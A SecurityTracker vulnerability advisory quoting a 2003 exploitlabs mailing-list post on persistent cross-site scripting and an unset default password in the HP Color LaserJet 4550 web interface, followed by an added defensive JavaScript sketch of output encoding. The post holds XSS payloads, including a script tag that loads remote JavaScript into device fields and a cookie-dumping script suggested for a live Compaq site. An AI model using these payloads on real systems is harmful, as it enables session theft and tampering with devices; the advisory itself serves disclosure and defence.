SecurityTracker.com
Category:   Device (Printer)  >   HP Printer
Vendors:   HPE
HP Color LaserJet Web Interface Permits Remote Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1007293
SecurityTracker URL:  http://securitytracker.com/id/1007293
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 24 2003
Impact:   Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): Color LaserJet 4550
Description:   A vulnerability was reported in the HP Color LaserJet 4550. A remote user can conduct cross-site scripting attacks. The device also ships with no password set by default.

exploitlabs.com reported that the system is configured by default to have no password. Because of this, a remote user can access the web-based management interface.

It is also reported that the web interface does not filter HTML from user-supplied input. A remote user can create HTML that, when loaded by the target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the printer and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the printer, access data recently submitted by the target user via web form to the printer, or take actions on the printer acting as the target user.

Impact:   A remote user can gain access to the web-based administration interface (in the default configuration where no password has been set).

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the printer, access data recently submitted by the target user via web form to the printer, or take actions on the printer acting as the target user. A remote user can also temporarily render the target user's web interface unusable.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.hp.com/
Cause:   Configuration error, Input validation error

Message History:   None.


 Source Message Contents

Subject:  [0day] HP LaserJet 4550 - Remote XSS DoS


-= 0day - Freedom of Voice - Freedom of Choice =-

------------------------------------------------------------------
          - EXPL-A-2003-018 exploitlabs.com Advisory 018
------------------------------------------------------------------
                  -= HP Color LaserJet 4550 =-




Donnie Werner
July 22, 2003
http://exploitlabs.com



Product:
--------
Hewlett Packard Color LaserJet 4550 ( possibly others )


Vulnerability(s):
-----------------
1. Remote Persistent Xss DoS
2. no default password


Description of product:
-----------------------
"Designed for business professionals who want
 to communicate more effectively using high-quality,
  professional - looking color documents"




VULNERABILITY / EXPLOIT
=======================

1. Remote Persistent Xss DoS
-------------------------------

The remote administration interface of the
HP Color LaserJet 4550 uses extensive javascript in
building dynamic content for administration of the
printer's setup and management.

uhh oh..


Detail: by introducing XSS we render the remote interface useless...


Example 1.

Add Link:
 The HP allows an inclusion of a user definable link...



http://[printer-ip]/hp/device/this.LCDispatcher?update=html&cat=0&pos=0&submit=go
http://[printer-ip]/hp/device/this.LCDispatcher

as you can see the left hand menu has completely been rendered useless...
( sorry )


Device:
 LINKS:


when re-rendered we get weird output depending on the JS used..
some examples..

http://<iframe%20src=/

" id="lnkOtherLink0" target="_blank">

http://[printer-ip]/hp/device/htt</font></a><br></p></div><div%20id=


looking at the source...

--------- snip -------------
}
document.writeln('<div id="navcap"><img border="0"
src="images/button_bottom.gif" width="140" height="21"><BR>');
string = 'Other Links';
document.writeln('<p><b>' + string + '</b><br>');
tmpString = '<a target="_blank"
href="this.LCLinkedPageImpl?LCLinkedPage=html&page=my_printer"
id="lnkHardLink0"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2">My Printer</font></a><br><a target="_blank"
href="this.LCDispatcher?dispatch=html&page=order_supplies"
id="lnkHardLink1"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2">Order Supplies</font></a><br><a target="_blank"
href="http://productfinder.support.hp.com/servlet/FindIt?q=[C7085A]&t=hp&s=
x" id="lnkHardLink2"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2">Solve A Problem</font></a><br>';
document.writeln(tmpString);
tmpString = '<a href="http://<script>alert("You are vunerable to xss -
discover" id="lnkOtherLink0" target="_blank"><font
face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2"><script>alert("Y</font></a><br>';
document.writeln(tmpString + '</p>');
document.writeln('</div>');
mapheight = navcaptop - topofbuttons;
document.writeln('<div id="navmap"><img border="0" src="images/spacer.gif"
width="140" height="'+mapheight+'" usemap="#buttonsmap"></div>');
document.writeln('<MAP NAME="buttonsmap">');
for (var i=0; i < buttonarray.length; i++) {
document.writeln('<AREA SHAPE="rect"
COORDS="'+buttonarray[i]['mapcoords']+'",
HREF="'+buttonarray[i]['href']+'">');
}document.writeln('</MAP>');</script>
------- snip -------------

ouch!!


Example 2.

DIAGNOSTICS
 Network Statistics
 > Protocol Info
 Test Page

system contact and system location both vuln to..

<script language="JavaScript"
src="http://www.astalavista.com/backend/news.js"
type="text/javascript"></script>

which allows remote inclusion that is persistent

this  writes to the rom and is viewable even over snmp



I am assuming the only way to fix these issues
 are to upgrade the rom or reset via a CLI interface


2. no default password
-----------------------
if this was set this couldn't happen I guess.. ( oops again )



Local:
------
yes

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day ( aww.. shucks )



Vendor Contact:
---------------
Concurrent with this advisory
support@hp.com
security@hp.com

Credits:
--------
Donnie Werner
morning_wood@exploitlabs.com
http://exploitlabs.com



===========================
EXTRA FUN WiTH HP / COMPAQ:
===========================

http://www.smb.compaq.com/dcart/cart.asp?oi=E9CED&BEID=19701&SBLID=

locate the "e-cupon" box
enter <script>document.write(document.cookie)</script>
press "Submit"
laugh "real hard"

_______________________________________________
0day mailing list
0day@nothackers.org
http://nothackers.org/mailman/listinfo/0day
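
Added example (not part of the SecurityTracker entry, the exploitlabs advisory, or HP firmware): the page source quoted in the advisory shows a stored link being pasted into a JavaScript string that document.writeln() then parses as HTML. The sketch below models that pattern beside a hardened version that validates the URL and encodes for both contexts; all function names are hypothetical.

```javascript
// Added example. Function names are hypothetical, not HP firmware code.

// Vulnerable pattern: the stored link is pasted raw into a single-quoted JS
// string that document.writeln() later parses as HTML.
function renderLinkVulnerable(url, label) {
  return "tmpString = '<a href=\"" + url + "\" target=\"_blank\">" +
         label + "</a><br>';";
}

// Accept only absolute http(s) URLs that the WHATWG parser can parse.
// Anything else is rejected when the link is saved, so nothing is stored.
function safeLinkUrl(raw) {
  let u;
  try { u = new URL(raw); } catch { return null; }
  return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : null;
}

// Inner context: HTML text and double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Outer context: a JS string literal inside an inline <script> block.
// Everything outside a small safe set becomes \uXXXX, which covers quotes,
// backslashes, line terminators and any "</script>" sequence.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 _.,:\/;&#?=%-]/g, c =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened pattern: validate the URL, then encode for HTML first (the
// innermost parser) and for the JS string second (the outermost one).
function renderLinkHardened(url, label) {
  const href = safeLinkUrl(url);
  if (href === null) return null;
  const enc = v => escapeJsString(escapeHtml(v));
  return "tmpString = '<a href=\"" + enc(href) + "\" target=\"_blank\">" +
         enc(label) + "</a><br>';";
}
```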

 
 



Copyright 2022, SecurityGlobal.net LLC